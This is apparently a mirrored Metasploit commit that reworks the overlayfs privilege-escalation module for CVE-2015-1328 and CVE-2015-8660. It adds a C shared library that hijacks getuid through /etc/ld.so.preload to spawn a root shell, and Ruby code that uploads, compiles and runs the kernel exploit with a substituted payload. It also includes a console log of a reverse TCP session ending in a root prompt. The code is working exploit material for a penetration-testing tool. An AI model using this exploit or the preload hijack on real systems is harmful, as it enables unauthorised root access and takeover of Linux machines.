mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
revamped
This commit is contained in:
parent
12493d5c06
commit
0d1fe20ae5
Binary file not shown.
BIN
data/exploits/CVE-2015-1328/ofs-lib.so
Normal file
BIN
data/exploits/CVE-2015-1328/ofs-lib.so
Normal file
Binary file not shown.
@ -129,18 +129,18 @@ Untested against
|
||||
|
||||
#### Escalate
|
||||
|
||||
resource (/root/Text-1.txt)> use exploit/linux/local/overlayfs_priv_esc
|
||||
resource (/root/Text-1.txt)> set verbose true
|
||||
resource (overlay.rc)> use exploit/linux/local/overlayfs_priv_esc
|
||||
resource (overlay.rc)> set verbose true
|
||||
verbose => true
|
||||
resource (/root/Text-1.txt)> set payload linux/x86/shell/reverse_tcp
|
||||
resource (overlay.rc)> set payload linux/x86/shell/reverse_tcp
|
||||
payload => linux/x86/shell/reverse_tcp
|
||||
resource (/root/Text-1.txt)> set session 1
|
||||
session => 1
|
||||
resource (/root/Text-1.txt)> set target 0
|
||||
resource (overlay.rc)> set target 0
|
||||
target => 0
|
||||
resource (/root/Text-1.txt)> set lhost 192.168.2.117
|
||||
resource (overlay.rc)> set session 1
|
||||
session => 1
|
||||
resource (overlay.rc)> set lhost 192.168.2.117
|
||||
lhost => 192.168.2.117
|
||||
resource (/root/Text-1.txt)> exploit
|
||||
resource (overlay.rc)> exploit
|
||||
[*] Started reverse TCP handler on 192.168.2.117:4444
|
||||
[*] Checking if mount points exist
|
||||
[+] /tmp/ns_sploit not created
|
||||
@ -150,31 +150,32 @@ Untested against
|
||||
[*] Checking if mount points exist
|
||||
[+] /tmp/ns_sploit not created
|
||||
[+] Kernel 3.13.0.pre.24.pre.generic is vulnerable to CVE-2015-1328
|
||||
[*] Writing to /tmp/k4JlQwrx.c (4375 bytes)
|
||||
[*] Writing to /tmp/JmK51Dpa.c (3714 bytes)
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 4375 bytes in 1 chunks of 15306 bytes (octal-encoded), using printf
|
||||
[*] Compiling /tmp/k4JlQwrx.c
|
||||
[*] Writing to /tmp/cjKriIIN (155 bytes)
|
||||
[*] Writing 3714 bytes in 1 chunks of 13319 bytes (octal-encoded), using printf
|
||||
[*] Writing to /tmp/ofs-lib.c (439 bytes)
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 439 bytes in 1 chunks of 1563 bytes (octal-encoded), using printf
|
||||
[*] Compiling /tmp/JmK51Dpa.c
|
||||
[*] Writing to /tmp/R6TrMF7f (155 bytes)
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
|
||||
[*] Exploiting...
|
||||
[*] Sending stage (36 bytes) to 192.168.2.156
|
||||
[*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.156:57869) at 2016-10-04 22:55:04 -0400
|
||||
[+] Deleted /tmp/k4JlQwrx.c
|
||||
[+] Deleted /tmp/cjKriIIN
|
||||
[*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.156:35876) at 2016-10-14 11:26:49 -0400
|
||||
[!] Tried to delete /tmp/ofs-lib.c, unknown result
|
||||
[+] Deleted /tmp/JmK51Dpa
|
||||
|
||||
3437009797
|
||||
lGTsPkjgaOAhZPAssSiPBdigTNuavPNA
|
||||
2356964145
|
||||
psMfOJcKGKnafhAvALIeSFNegauafmux
|
||||
RHxxKeTrEKLTMmssPTZjlJvkpblZjWSH
|
||||
KWETRaFhNLLRkUbhRkRoflvdRdbJBPFP
|
||||
true
|
||||
zQgQeZUDzBZvCUelOYXjpIviozSnTjoE
|
||||
ZaGCLiKvvhyTawBwPHNqidQSerdmxDYE
|
||||
WjOaBQVXdxHBiVdomUBMRRrnLOPUGfGD
|
||||
true
|
||||
DgSZZHBIFrsBMvyRTBNSBTcRmVMZXMyx
|
||||
bwHnnuHwZAvSsZoYLhNrcuRDIKuqPRWu
|
||||
NfNIsINldyrgOLLagCPIQiQsZqTsmUec
|
||||
ORoIgajQlzSvaciHEGqEvQZqLZMpJDjQ
|
||||
dTdIcyWRpQOpEHizUhOQkDVqQZaxQIFR
|
||||
UCINXsLPGwYDBqnRKbFyLFOzkbifFPiF
|
||||
sh: 0: can't access tty; job control turned off
|
||||
# whoami
|
||||
# # # whoami
|
||||
root
|
||||
# uname -a
|
||||
Linux Ubuntu14 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
|
||||
|
@ -95,6 +95,7 @@ main(int argc, char **argv)
|
||||
}
|
||||
|
||||
fprintf(stderr,"/etc/ld.so.preload created\n");
|
||||
/*
|
||||
fprintf(stderr,"creating shared library\n");
|
||||
lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
|
||||
write(lib,LIB,strlen(LIB));
|
||||
@ -103,7 +104,7 @@ main(int argc, char **argv)
|
||||
if(lib != 0) {
|
||||
fprintf(stderr,"couldn't create dynamic library\n");
|
||||
exit(-1);
|
||||
}
|
||||
}*/
|
||||
write(fd,"/tmp/ofs-lib.so\n",16);
|
||||
close(fd);
|
||||
system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
|
||||
|
16
external/source/exploits/CVE-2015-1328/ofs-lib.c
vendored
Normal file
16
external/source/exploits/CVE-2015-1328/ofs-lib.c
vendored
Normal file
@ -0,0 +1,16 @@
|
||||
#include <unistd.h>
|
||||
|
||||
uid_t(*_real_getuid) (void);
|
||||
char path[128];
|
||||
|
||||
uid_t getuid(void){
|
||||
_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, "getuid");
|
||||
readlink("/proc/self/exe", (char *) &path, 128);
|
||||
if(geteuid() == 0 && !strcmp(path, "/bin/su")) {
|
||||
unlink("/etc/ld.so.preload");unlink("/tmp/ofs-lib.so");
|
||||
setresuid(0, 0, 0);
|
||||
setresgid(0, 0, 0);
|
||||
execle("/bin/sh", "sh", "-i", NULL, NULL);
|
||||
}
|
||||
return _real_getuid();
|
||||
}
|
@ -161,17 +161,6 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
|
||||
end
|
||||
|
||||
|
||||
# direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
|
||||
path = ::File.join( Msf::Config.install_root, 'external', 'sources', 'exploits', 'CVE-2015-1328', '1328.c')
|
||||
fd = ::File.open( path, "rb")
|
||||
cve_2015_1328 = fd.read(fd.stat.size)
|
||||
|
||||
# direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
|
||||
path = ::File.join( Msf::Config.install_root, 'external', 'sources', 'exploits', 'CVE-2015-8660', '8660.c')
|
||||
fd = ::File.open( path, "rb")
|
||||
cve_2015_8660 = fd.read(fd.stat.size)
|
||||
|
||||
filename = rand_text_alphanumeric(8)
|
||||
executable_path = "#{datastore['WritableDir']}/#{filename}"
|
||||
payloadname = rand_text_alphanumeric(8)
|
||||
@ -200,33 +189,70 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
|
||||
end
|
||||
|
||||
def upload_and_chmod(fname,fcontent)
|
||||
def upload_and_chmod(fname, fcontent, cleanup=true)
|
||||
print_status "Writing to #{fname} (#{fcontent.size} bytes)"
|
||||
rm_f fname
|
||||
write_file(fname, fcontent)
|
||||
cmd_exec("chmod +x #{fname}")
|
||||
#register_file_for_cleanup(fname)
|
||||
if cleanup
|
||||
register_file_for_cleanup(fname)
|
||||
end
|
||||
end
|
||||
|
||||
def on_new_session(session)
|
||||
super
|
||||
if target.name == 'CVE-2015-1328'
|
||||
session.shell_command("/bin/su") #this doesnt work on meterpreter?????
|
||||
# we cleanup here instead of earlier since we needed the /bin/su in our new session
|
||||
session.shell_command('rm -f /etc/ld.so.preload')
|
||||
session.shell_command('rm -f /tmp/ofs-lib.so')
|
||||
end
|
||||
end
|
||||
|
||||
if compile
|
||||
begin
|
||||
if target.name == 'CVE-2015-1328'
|
||||
# direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
|
||||
# Also removed the on-the-fly compilation of ofs-lib.c and we do that manually ahead of time, or drop the binary.
|
||||
path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-1328', '1328.c')
|
||||
fd = ::File.open( path, "rb")
|
||||
cve_2015_1328 = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
|
||||
# pulled out from 1328.c's LIB define
|
||||
path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-1328', 'ofs-lib.c')
|
||||
fd = ::File.open( path, "rb")
|
||||
ofs_lib = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
else
|
||||
# direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
|
||||
path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-8660', '8660.c')
|
||||
fd = ::File.open( path, "rb")
|
||||
cve_2015_8660 = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
end
|
||||
rescue
|
||||
compile = false #hdm said external folder is optional and all module should run even if external is deleted. If we fail to load, default to binaries
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if compile
|
||||
if target.name == 'CVE-2015-1328'
|
||||
cve_2015_1328.gsub!(/execl\("\/bin\/su","su",NULL\);/,
|
||||
"execl(\"#{payload_path}\",\"#{payloadname}\",NULL);")
|
||||
upload_and_chmod("#{executable_path}.c", cve_2015_1328)
|
||||
ofs_path = "#{datastore['WritableDir']}/ofs-lib"
|
||||
upload_and_chmod("#{ofs_path}.c", ofs_lib)
|
||||
cmd_exec("gcc -fPIC -shared -o #{ofs_path}.so #{ofs_path}.c -ldl -w") # compile dependency file
|
||||
register_file_for_cleanup("#{ofs_path}.c")
|
||||
else
|
||||
cve_2015_8660.gsub!(/os.execl\('\/bin\/bash','bash'\)/,
|
||||
"os.execl('#{payload_path}','#{payloadname}')")
|
||||
upload_and_chmod("#{executable_path}.c", cve_2015_8660)
|
||||
end
|
||||
vprint_status("Compiling #{executable_path}.c")
|
||||
cmd_exec("gcc -o #{executable_path} #{executable_path}.c") #compile
|
||||
cmd_exec("gcc -o #{executable_path} #{executable_path}.c") # compile
|
||||
register_file_for_cleanup(executable_path)
|
||||
else
|
||||
if target.name == 'CVE-2015-1328'
|
||||
@ -235,9 +261,18 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
cve_2015_1328 = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
upload_and_chmod(executable_path, cve_2015_1328)
|
||||
|
||||
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-1328', 'ofs-lib.so')
|
||||
fd = ::File.open( path, "rb")
|
||||
ofs_lib = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
ofs_path = "#{datastore['WritableDir']}/ofs-lib"
|
||||
# dont auto cleanup or else it happens too quickly and we never escalate ourprivs
|
||||
upload_and_chmod("#{ofs_path}.so", ofs_lib, false)
|
||||
|
||||
# overwrite with the hardcoded variable names in the compiled versions
|
||||
payload_filename = 'cjKriIIN'
|
||||
payload_path = '/tmp/cjKriIIN'
|
||||
payload_filename = 'lXqzVpYN'
|
||||
payload_path = '/tmp/lXqzVpYN'
|
||||
else
|
||||
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8660', '8660')
|
||||
fd = ::File.open( path, "rb")
|
||||
|
Loading…
Reference in New Issue
Block a user